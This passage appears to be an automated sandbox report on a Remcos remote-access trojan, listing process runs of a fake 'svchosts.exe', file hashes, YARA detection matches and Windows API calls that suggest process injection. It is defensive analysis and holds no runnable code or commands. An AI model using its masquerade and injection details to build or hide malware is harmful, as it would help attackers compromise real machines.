                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
                                        Imagebase:0x790000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000017.00000002.409864632.000000000404F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000017.00000002.407164584.0000000002EC4000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:13:20:35
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Users\user\AppData\Roaming\remcos\svchosts.exe'
                                        Imagebase:0x5f0000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000019.00000002.421492633.0000000002A84000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000019.00000002.424438341.0000000003C0F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low

                                        General

                                        Start time:13:20:56
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):false
                                        Commandline:{path}
                                        Imagebase:0x340000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low

                                        General

                                        Start time:13:20:57
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x810000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.471564626.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        General

                                        Start time:13:21:05
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x7ff6741d0000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000021.00000002.403933269.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        General

                                        Start time:13:21:12
                                        Start date:24/05/2021
                                        Path:C:\Users\user\AppData\Roaming\remcos\svchosts.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x900000
                                        File size:723968 bytes
                                        MD5 hash:6FB384AF6E5FD9D345650E37B1B58098
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Remcos_1, Description: Remcos Payload, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                        • Rule: Remcos, Description: detect Remcos in memory, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000024.00000002.419025406.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                        Reputation:low

                                        Disassembly

                                        Code Analysis

                                        Reset < >

                                          Executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: &h`7
                                          • API String ID: 0-1067023310
                                          • Opcode ID: 448732bfb681c6c2b380a3b5b69a3fd52ccc37be3b736738cb86e571ba58fbc0
                                          • Instruction ID: 140d44bff3c26c2e926ee9c550df15e24ed0694f6448804423bf2ed6d6279d1c
                                          • Opcode Fuzzy Hash: 448732bfb681c6c2b380a3b5b69a3fd52ccc37be3b736738cb86e571ba58fbc0
                                          • Instruction Fuzzy Hash: ED811771E0062A8BDB68CF65CD847D9BBB2FF89300F1481EAD50DA7654EB705A85CF80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: &h`7
                                          • API String ID: 0-1067023310
                                          • Opcode ID: 958da545aabbc4ec313c7c9824d6d7e82c26829bf92c28565d285ed3a65d6f50
                                          • Instruction ID: cd4d4465aba08abbc7f39f5bb3dc851e73825aee873fcad67b40ecba3a9e570c
                                          • Opcode Fuzzy Hash: 958da545aabbc4ec313c7c9824d6d7e82c26829bf92c28565d285ed3a65d6f50
                                          • Instruction Fuzzy Hash: 1C513BB1E0061A8BDB29CF65CD447D9BBB2BF88300F14C2EAD509A7254EB705AC1CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: &h`7
                                          • API String ID: 0-1067023310
                                          • Opcode ID: d5c7b0ae1c8f361010f97a5c3e05be90c10c3a698e7543fea7576ca115f719db
                                          • Instruction ID: 97b86de4a12922900892972685c269ddd1d1a2c356fb89156cdc1fe065c05dd7
                                          • Opcode Fuzzy Hash: d5c7b0ae1c8f361010f97a5c3e05be90c10c3a698e7543fea7576ca115f719db
                                          • Instruction Fuzzy Hash: 36513570E0062A8BCB64CF64CD84BD9B7B2BF89300F1482EAD509A7654EB709EC1CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a376563a58407c0e921abfdae3a17a0b4d6bd843eb77c496da2af4338a82ed7a
                                          • Instruction ID: f2fface24a6d04d7930b1ffb5fda249e54d92443e6240fb08141d9a2ae8ffce6
                                          • Opcode Fuzzy Hash: a376563a58407c0e921abfdae3a17a0b4d6bd843eb77c496da2af4338a82ed7a
                                          • Instruction Fuzzy Hash: 77527035B001159FDB54DF6AC8C8AADB7B2BF88314B158469F906DB360DB38EE41CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 72b61ae0b68beb89f973c9de5d1735880587c83c16fd87065f41a64366d1474c
                                          • Instruction ID: 0f04a8a5da750447eaac7390420c438e5ed32d4e6e3b88cbd788703c683546a3
                                          • Opcode Fuzzy Hash: 72b61ae0b68beb89f973c9de5d1735880587c83c16fd87065f41a64366d1474c
                                          • Instruction Fuzzy Hash: D152E874A041189FCB64DF64C898B9DB7B2EF89304F1181D9E50AA73A5DF34AE81CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3291dbe7571854cd90fe1c3637708a9cfe1034b15838b28ba04df2bc015a1606
                                          • Instruction ID: 86504263198fe454781f4acd5b0712505231ad1595c16c2373e07685b7aff40e
                                          • Opcode Fuzzy Hash: 3291dbe7571854cd90fe1c3637708a9cfe1034b15838b28ba04df2bc015a1606
                                          • Instruction Fuzzy Hash: EAE1D274F002159FCB58CF66C5C4AAEBBB2AF85304F65846DE406AB3A1CB31DD42CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6491e7006413bf17e94c575dc18cab0e1f555edaf5f3a745228a85ae135ecfa4
                                          • Instruction ID: 985600aff3cecf53893307975d2bbb6b582e2d0e44dc59b6f6571b241e019d54
                                          • Opcode Fuzzy Hash: 6491e7006413bf17e94c575dc18cab0e1f555edaf5f3a745228a85ae135ecfa4
                                          • Instruction Fuzzy Hash: FCA17A74E042498FCB04CFA9C984ADEBFF2AF89310F20852AE555BB3A5D7344941CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bfdf07f9dc5e2910dba3dc7ed2477be5b585880b1d98bd48f409bf452cde51c9
                                          • Instruction ID: 17a6301a2a068c0e97c5c23ab6f5b46ca50e337977d9381b2e00c72a388c461d
                                          • Opcode Fuzzy Hash: bfdf07f9dc5e2910dba3dc7ed2477be5b585880b1d98bd48f409bf452cde51c9
                                          • Instruction Fuzzy Hash: B481D374E002188FDB48CFEAC984AEEBBB2FF88304F10942AD515AB354D7749945CF65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ccbba6ad279b3071868d4131cf886f05de19cf7a6fa696d7f09fea6c96af7cea
                                          • Instruction ID: 5ce278c971ca9c62a2814bea89525d1b0dfd3619013aa41449f4d1062827d851
                                          • Opcode Fuzzy Hash: ccbba6ad279b3071868d4131cf886f05de19cf7a6fa696d7f09fea6c96af7cea
                                          • Instruction Fuzzy Hash: FE611BB4D0A618DFDB19CFD5E9806DDFBF2AF8A310F24A86AD409B7254D3748942CB14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1dac72cd35bd556d82ab927d94fc99fe8b390d803c4322d7fd0135b0b051d416
                                          • Instruction ID: 44a400767f1e5af0b9753283fa883be24e30ed7b7b19aa6a4267a3ae07def780
                                          • Opcode Fuzzy Hash: 1dac72cd35bd556d82ab927d94fc99fe8b390d803c4322d7fd0135b0b051d416
                                          • Instruction Fuzzy Hash: 5E51E474E002599FDB44DFAAC980AEEFBB2FF88301F24C569E414A7355DB349942CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9c254d4715fab13e23a1273d5e2f0330f2a3c8dcc84d51ab1a660763cc4e0111
                                          • Instruction ID: 3b0ca6f111bf4b7d1012c0fee0e37ead15f390949e2ebc40db09707dad733a2b
                                          • Opcode Fuzzy Hash: 9c254d4715fab13e23a1273d5e2f0330f2a3c8dcc84d51ab1a660763cc4e0111
                                          • Instruction Fuzzy Hash: E6512FB0E042099FDB44CFA6C4845AEFBF2FF89305F14D46AE51AA7255D7348A41CFA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b1e22ad5aad4043994c1850461a8c057cb84ee27f006743dda0fcf2a304ccedf
                                          • Instruction ID: c8ebf8e37eac73ca0bcbf86e66d38115e739578f50decc21485ef8e6408af076
                                          • Opcode Fuzzy Hash: b1e22ad5aad4043994c1850461a8c057cb84ee27f006743dda0fcf2a304ccedf
                                          • Instruction Fuzzy Hash: 75315C74E19218CFDB08CFA9D9445DDBBF6FB8E250F18A566D50AB3358D7349801CB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 42ccd5b005a22cb15a8e7a5c546e2b9d9ec452c5f4684c4096a0a07f5be3cc9b
                                          • Instruction ID: 2e9a07611f7244729e057d1057d698d27e3cb675a1c07430dc07ba36cfd3b882
                                          • Opcode Fuzzy Hash: 42ccd5b005a22cb15a8e7a5c546e2b9d9ec452c5f4684c4096a0a07f5be3cc9b
                                          • Instruction Fuzzy Hash: 73316BB4E152088FDB08CFA9D9445DDBBF6FB8E240F18996AD106B3358D7349941CB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: dccc835ee246162292e94937dc75cf5aefc34cdf8727585e2dbefe5831bb830f
                                          • Instruction ID: 8a09b415ee3c3c853e8064f43c5876f00410bad59d243dc8b2c538069049bd56
                                          • Opcode Fuzzy Hash: dccc835ee246162292e94937dc75cf5aefc34cdf8727585e2dbefe5831bb830f
                                          • Instruction Fuzzy Hash: 4E21E6B1E016188BEB58CFA7D9802DEBBF3AFC8311F14C16AD509B6268DB340A45CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 04B597CE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 7e280aefab06bec40cedff6715aa786e3a3373034932d0d95ce40004323701bd
                                          • Instruction ID: ab42224c9c83ca082c72b9c1e9cbe2cdefb17040785bc196d84f1a34481e98a2
                                          • Opcode Fuzzy Hash: 7e280aefab06bec40cedff6715aa786e3a3373034932d0d95ce40004323701bd
                                          • Instruction Fuzzy Hash: B67125B0A00B059FD724DF69D05075ABBF2FF88304F00896AD94AD7A50DB74F819CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 026335F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 13316c26e3bdac87b0b35173b102118aa6197fb16359d4452e4aad801b674e2e
                                          • Instruction ID: 969fbb5f635e724798ea9f9411a206bc171f790b35e61296a87832e72f99b8f1
                                          • Opcode Fuzzy Hash: 13316c26e3bdac87b0b35173b102118aa6197fb16359d4452e4aad801b674e2e
                                          • Instruction Fuzzy Hash: 24511571901318DFDB61DF99C880BDDBBB6AF48314F15809AE948A7310DB719A89CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 026335F3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 56b38630efc4937214ec050477554e3f429e0fac6a07af229a395a842a65d91a
                                          • Instruction ID: fdd572fda32d698e823f157f296d61b2453b2a3b1832ac0c96ca2b3408e9f2e8
                                          • Opcode Fuzzy Hash: 56b38630efc4937214ec050477554e3f429e0fac6a07af229a395a842a65d91a
                                          • Instruction Fuzzy Hash: E2510571900319DFDB61DF99C880BDDBBB5BF48314F1581AAE908A7310DB719A89CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 04B55661
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: f6cf2e1f567ded0f3f4426359edc354c9376331517e861f2f41c6fc7b77d9c8c
                                          • Instruction ID: 72705135c5af62753907d6472e56fd1292923953618e7e7643c8788d510d8715
                                          • Opcode Fuzzy Hash: f6cf2e1f567ded0f3f4426359edc354c9376331517e861f2f41c6fc7b77d9c8c
                                          • Instruction Fuzzy Hash: 63410471C00619CFDB24DFA9C844B9EFBB1FF88304F2480A9D418AB254DB756946CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateActCtxA.KERNEL32(?), ref: 04B55661
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: Create
                                          • String ID:
                                          • API String ID: 2289755597-0
                                          • Opcode ID: a480ba8f858e93107534d32ce8ec95da6ffbdd159bf14388748fb49b1d50d62a
                                          • Instruction ID: aa474d84795f1b17095263ad001d8ca25a32ed328687d86c1b5e10c0ec6983ee
                                          • Opcode Fuzzy Hash: a480ba8f858e93107534d32ce8ec95da6ffbdd159bf14388748fb49b1d50d62a
                                          • Instruction Fuzzy Hash: EF411371D00618DFDB20DFA9C844B9EFBB1FF88308F2080A9D408AB254DB756946CFA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02633AD5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: ffa78686290eb392bc68748eb55f9557802dfe06984e600a99aefa364d82cdf6
                                          • Instruction ID: 9fd38c83b812af9f8504fedc5e40acb60339e862a26c20a919707e4a36172737
                                          • Opcode Fuzzy Hash: ffa78686290eb392bc68748eb55f9557802dfe06984e600a99aefa364d82cdf6
                                          • Instruction Fuzzy Hash: DB2123B19003099FCB10CFA9D985BDEBBF4FF48314F10842AE919A3340D338A945CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 02633AD5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessWrite
                                          • String ID:
                                          • API String ID: 3559483778-0
                                          • Opcode ID: 687ce64e4549d368f031c35c6cb0220d1fdc4aa53878c96b57c7c14d8fc9d682
                                          • Instruction ID: 4d284122af87b659652afcd7825ed98cb29a611843abc6c02dc0baf2ed6dab14
                                          • Opcode Fuzzy Hash: 687ce64e4549d368f031c35c6cb0220d1fdc4aa53878c96b57c7c14d8fc9d682
                                          • Instruction Fuzzy Hash: D321E3B19002499FCB10CF9AD985BDEBBF4FF48314F10846AE919A3340D778A954CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04B5BE66,?,?,?,?,?), ref: 04B5BF27
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: a2489b8278c47ecd3f04bec1fc6081b4284124ce7b1c8912ef5b4545105a73d9
                                          • Instruction ID: 0371b0d6634022ac0d5c2417b41e08e0ea7d1c505ec756b6d44a7378574b68a2
                                          • Opcode Fuzzy Hash: a2489b8278c47ecd3f04bec1fc6081b4284124ce7b1c8912ef5b4545105a73d9
                                          • Instruction Fuzzy Hash: FA21E7B5904209AFDB10CF99D884BEEFBF8EB48324F14845AE915A7310D374A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04B5BE66,?,?,?,?,?), ref: 04B5BF27
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 7f6d5b7b98ff8a6c2c7d7af699241741bbcdfadc6c63b49f7a29f20066d3c6a8
                                          • Instruction ID: c0640c620be8204905b796929f41ff431850218afcafc98310a59c781556566c
                                          • Opcode Fuzzy Hash: 7f6d5b7b98ff8a6c2c7d7af699241741bbcdfadc6c63b49f7a29f20066d3c6a8
                                          • Instruction Fuzzy Hash: 7321E4B5D00209AFDB10CFA9D884ADEFBF4EB48320F14805AE959A3310D378A945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0263394F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: 2d7a36c6b7d63b19eb00a6911bb07a64398fecea1895a93fe9b9178402605318
                                          • Instruction ID: d236cea7a2c9312ad6c0173b742b2e7f907684b8c4fedfeadf52952bf5452826
                                          • Opcode Fuzzy Hash: 2d7a36c6b7d63b19eb00a6911bb07a64398fecea1895a93fe9b9178402605318
                                          • Instruction Fuzzy Hash: C221F5B19002499FCB10CF9AD885ADEFBF4FB48324F108429E918A3340D734A944CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0263394F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: MemoryProcessRead
                                          • String ID:
                                          • API String ID: 1726664587-0
                                          • Opcode ID: baf23e8a8d57570d95959af7c1eb5d1e9c9773c0e147c737fecffaa9582b8739
                                          • Instruction ID: d5f5616ad330ccdb13429311e9823f2bc1baa404534e40e066b510030bc87f66
                                          • Opcode Fuzzy Hash: baf23e8a8d57570d95959af7c1eb5d1e9c9773c0e147c737fecffaa9582b8739
                                          • Instruction Fuzzy Hash: 9021D0B19002499FCB10CF9AD984ADEFBF4FB48320F10846AE968A3350D374A954CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 02633887
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: cf8ce952988165775cf50285bf8be32118cc61260131b34d90788045796b5068
                                          • Instruction ID: 02ee6931fdb9262ab6156f31900995e3936351fe6e8740ba8ad81208159a1906
                                          • Opcode Fuzzy Hash: cf8ce952988165775cf50285bf8be32118cc61260131b34d90788045796b5068
                                          • Instruction Fuzzy Hash: B92124B1D0021A9FCB14CF9AD9857EEFBF4BB08224F14816AD419B3340D778A945CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 02633887
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: ContextThread
                                          • String ID:
                                          • API String ID: 1591575202-0
                                          • Opcode ID: cff0cf4d14e74ab4956b0c4f6937db1ae6406be7ee36d41f74d8f1074da61d32
                                          • Instruction ID: eeeba1962837104b6f8396873ac1745a0932be6d1228ef5d89b15d9a87e9e23d
                                          • Opcode Fuzzy Hash: cff0cf4d14e74ab4956b0c4f6937db1ae6406be7ee36d41f74d8f1074da61d32
                                          • Instruction Fuzzy Hash: B62106B1D0061A9FCB10CF9AD985BDEFBF4FB48224F14816AE418A3340D778A955CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04B59849,00000800,00000000,00000000), ref: 04B59A5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 02c4423b4821273a77f13e28d9b7088ca6b4d2bb17f76bd4269f6dbe7af9cd25
                                          • Instruction ID: d5b01fc6a7939a692ed5866a4eb5544f1aa679ff9dfbbe896081be56379dcf8e
                                          • Opcode Fuzzy Hash: 02c4423b4821273a77f13e28d9b7088ca6b4d2bb17f76bd4269f6dbe7af9cd25
                                          • Instruction Fuzzy Hash: 5B1117B2900209DFDB10DF9AD444BDEFBF4EB48324F14846AE919A7210C375A545CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,04B59849,00000800,00000000,00000000), ref: 04B59A5A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: d8ea8368d79e14b4ce7604bfdd47c2ffec2369b0a425eca6c7cd2000717d0c55
                                          • Instruction ID: 594a297ae37d4650134d7e327ea17e67cdfaf9ba920b375b4a731899b7f0401c
                                          • Opcode Fuzzy Hash: d8ea8368d79e14b4ce7604bfdd47c2ffec2369b0a425eca6c7cd2000717d0c55
                                          • Instruction Fuzzy Hash: 521117B2D002099FDB10DF9AD444BDEFBF4EB88320F14846AE919A7210C374A946CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02633A0B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID: AllocVirtual
                                          • String ID:
                                          • API String ID: 4275171209-0
